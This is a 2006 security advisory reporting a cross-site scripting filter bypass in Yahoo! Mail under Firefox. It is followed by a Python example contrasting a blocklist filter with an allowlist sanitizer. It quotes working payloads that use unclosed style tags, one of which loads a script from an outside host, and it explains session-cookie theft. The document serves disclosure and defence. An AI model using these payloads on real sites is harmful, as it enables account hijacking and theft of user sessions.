yahooXSSflaw.txt

Posted Jul 28, 2006
Authored by Simo64 | Site morx.org

Yahoo! Mail suffers from a cross site scripting flaw.

tags | advisory, xss
SHA-256 | 53aa1dbba6ce325a55d608e20fde59636f71ead1fd1dfcdde26ec3e0a8a77207

Title: Yahoo! Mail Filter Bypass

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: January 2006
Published: 26 July 2006
MorX Security Research Team
http://www.morx.org
http://www.morx.org/yahoo-firefox-bypass.txt

Service: Webmail

Vendor: Yahoo mail, and possibly others

Vulnerability: Filter bypass / Cross Site Scripting

Severity: Medium/High

Tested to be vulnerable on: Firefox 1.5.0.4

Not vulnerable: Microsoft IE 6.0, Opera 8.54

Details:

A few months ago I published a vulnerability affecting Yahoo! Mail with
MS IE, where the Yahoo! Mail filter failed to detect script (event handler)
attributes placed on the STYLE tag.

The combination code was:
<STYLE onload="alert(document.cookie)"> </STYLE>

A few days later Yahoo patched the above combination.

Now, if you send yourself that code, you will see that Yahoo filters it
this way:

<style onfiltered="alert(document.cookie)"> </style>

This is not a good way of filtering, since Yahoo filtered only the
"onload" attribute name and left the tag itself in place.

A few days later I received some emails asking how a similar
bypass combination could be executed on other browsers such as Firefox,
since that one worked only on IE. After some testing I realised that
Firefox will execute any JS code preceded by an unclosed <style tag.

Example:

<style <script>alert('a')</script>
or
<style <body onload="alert('a')">

Note that <style must be left open; if you close it with </style>, Firefox
won't execute the JS code.

In fact the first combination is not filtered by Yahoo! Mail at all.
Yahoo usually filters <script> and </script>, but when they are preceded by
the <style tag they are not filtered, which leads to script execution in
Firefox and to user account compromise.

Exploit code example:

<style <script>alert(document.cookie)</script>

<style <script SRC=http://www.morx.org/xss.js></script>

As you can see here from my Yahoo! Mail message source code, the code is
left unfiltered:

<div id=message>
<!-- type = text -->
<style <script SRC=http://www.morx.org/xss.js></script><BR>
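Added example, not part of the advisory or of Yahoo's code: a small Python model of the two filter behaviours described above. blocklist_filter is a hypothetical reconstruction of a blocklist filter that renames onload to onfiltered and stops inspecting after an unclosed <style (Yahoo's real filter is not shown on this page); allowlist_sanitize is the defensive alternative, which escapes every tag it does not explicitly allow, so the malformed <style <script> sequence reaches the browser as text.

```python
import html
import re

# Payloads quoted in the advisory, embedded here as constructed input.
ORIGINAL_PAYLOAD = '<STYLE onload="alert(document.cookie)"> </STYLE>'
BYPASS_PAYLOAD = "<style <script>alert(document.cookie)</script>"
BENIGN = "Hi <b>there</b> & <i>bye</i>"

TAG_RE = re.compile(r"<(/?)([a-zA-Z]+)([^>]*)>")
EVENT_ATTR_RE = re.compile(r"\bon\w+(?=\s*=)", re.I)
ALLOWED_TAG_RE = re.compile(r"<(/?)(b|i|p|br)>", re.I)

def blocklist_filter(markup: str) -> str:
    """Hypothetical model of a blocklist filter reproducing the behaviour
    the advisory reports (not Yahoo's real code): it renames on* attributes
    to onfiltered, drops <script> tags it recognises, and treats everything
    after a <style ...> tag as stylesheet text until </style>. An unclosed
    <style therefore hides the rest of the message from inspection."""
    out, pos, in_style = [], 0, False
    for m in TAG_RE.finditer(markup):
        slash, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
        if in_style and not (slash and name == "style"):
            continue                      # "inside the stylesheet": skipped
        out.append(markup[pos:m.start()])
        pos = m.end()
        if name == "script":
            continue                      # recognised bad tag: dropped
        in_style = name == "style" and not slash
        out.append(f"<{slash}{name}{EVENT_ATTR_RE.sub('onfiltered', attrs)}>")
    out.append(markup[pos:])
    return "".join(out)

def allowlist_sanitize(markup: str) -> str:
    """Allowlist alternative: only exact, attribute-free <b>, <i>, <p> and
    <br> tags pass through; every other '<', '>', '&' and quote is escaped,
    so malformed or unknown markup is rendered as text, never as a tag."""
    out, pos = [], 0
    for m in ALLOWED_TAG_RE.finditer(markup):
        out.append(html.escape(markup[pos:m.start()]))
        out.append(f"<{m.group(1)}{m.group(2).lower()}>")
        pos = m.end()
    out.append(html.escape(markup[pos:]))
    return "".join(out)

if __name__ == "__main__":
    for payload in (ORIGINAL_PAYLOAD, BYPASS_PAYLOAD, BENIGN):
        print("blocklist:", blocklist_filter(payload))
        print("allowlist:", allowlist_sanitize(payload))
```

Running it shows the blocklist model producing exactly the onfiltered rewrite quoted above while passing the <style <script> payload through untouched, whereas the allowlist version neutralises both and keeps the benign formatting.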


Impact:

An attacker can send the unfiltered code as an HTML email to a Yahoo! Mail
user running Firefox. Once the victim opens the malicious email, the
JavaScript content is executed in the target browser. This allows theft of
the user's session cookie, giving the attacker access to the victim's
mailbox for about 24 hours (until the cookie expires).

Screen captures:

www.morx.org/yahoo-firefox-bypass.jpg

Workaround:

Switch to another browser, or disable script execution until a patch is
released.

Disclaimer:

This entire document is for educational, testing and demonstration purposes
only. Modifying, using and/or publishing this information is entirely at
your OWN risk. The exploit code is to be used on your OWN email account. I
cannot be held responsible for any of the above. For comments or additional
questions, feel free to email me at simo_at_morx_org.
